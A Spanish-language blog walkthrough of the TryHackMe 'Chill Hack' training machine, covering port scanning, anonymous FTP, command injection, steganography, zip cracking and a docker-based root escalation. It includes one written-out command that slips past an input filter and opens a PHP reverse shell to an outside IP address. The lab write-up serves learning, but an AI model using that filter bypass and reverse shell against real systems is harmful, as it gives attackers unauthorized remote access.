top of page

TryHackMe/Chill Hack

  • n3n3c0
  • 17 feb 2022
  • 2 Min. de lectura

Actualizado: 20 feb 2022

Chill Hack es una máquina de dificultad 'fácil' en la cual practicaremos y afianzaremos conocimientos involucrados en inyección de comandos, escalada de privilegios a través de scripts en bash/php a un usuario y puertos abiertos los cuales trabajaremos para llegar a archivos ocultos.


*Existen varias maneras de solucionar esta sala vulnerable, os enseñare el método por el cual conseguí completarla, pero siempre podréis investigar por vuestra cuenta y sacar vuestra conclusión.


*Todas las herramientas, protocolos e información considerada relevante tiene sus correspondientes enlaces, por si es necesario documentarse y profundizar.




ree


¡Empecemos!


Empezaremos por realizar un escaneo de puerto con la herramienta NMAP.

Los puertos que nos muestra y que mas nos interesa para empezar a investigar son el 21(FTP), 22(SSH) y 80(HTTP).



ree

Vemos que podemos iniciar sesión por FTP con el usuario anónimo (Anonymous).


ree

Al entrar al servidor nos encontraos un archivo de texto.


ree

Revisemos el puerto 80:

Podemos ver que contiene una pagina web.


ree

Llevaré a cabo el lanzamiento de la herramienta Gobuster para buscar posibles directorios ocultos a simple vista.


ree

Al visitar el directorio 'secret' tenemos un input que permite ejecutar comandos filtrados como decía la nota encontrada en el servidor FTP.


ree

ree

Saltándonos el filtro crearemos una Reverse Shell en PHP a la máquina víctima dándonos acceso al usuario www-data.

Comando ejecutado

l\s | php -r '$sock=fsockopen("10.18.9.118",6969);exec("/bin/sh -i <&3 >&3 2>&3");'

ree


Antes de seguir conviene hacer un tratamiento a la Shell.

Veamos que contenido podemos ejecutar con este usuario.


ree

Una vez escalado privilegios buscaremos entre directorios que puede sernos útil.

Encuentro un archivo php el cual llama la atención "Hacker.php", su contenido nos otorga una pista.



ree

Levantaré un servidor con python en la máquina victima que me permitirá acceder y descargar la imagen correspondiente.


Imagen


ree


ree

Deduciremos con la pista otorgada anteriormente en el archivo hacker.php que hay algo escondido en la imagen, aplicaré esteganografía con la herramienta Steghide.


ree

El archivo zip contiene contraseña, la cual con fuerza bruta crackearemos.

Para este paso utilizaré John The Ripper que contiene un módulo especial para archivos zip.


ree
ree

El zip descomprime un archivo PHP con una contraseña encriptada.

Archivo descomprimido


ree



ree

Con esta contraseña se buscará escalar privilegios a otro usuario.


ree

Si nos fijamos este usuario (Anurodh) pertenece al grupo docker, llevaré a cabo una Shell de root con docker rompiendo las restricciones.


ree

¡Final!


Legados a este punto hemos conseguido completar la máquina, solo quedaría sacar las flags de los usuarios que nos pide la plataforma TryHackMe.


Root


ree


Usuario


ree


¡Enhorabuena! Una mas o una menos. ( ͡° ͜ʖ ͡°)



 
 
 

Comentarios


Publicar: Blog2_Post
bottom of page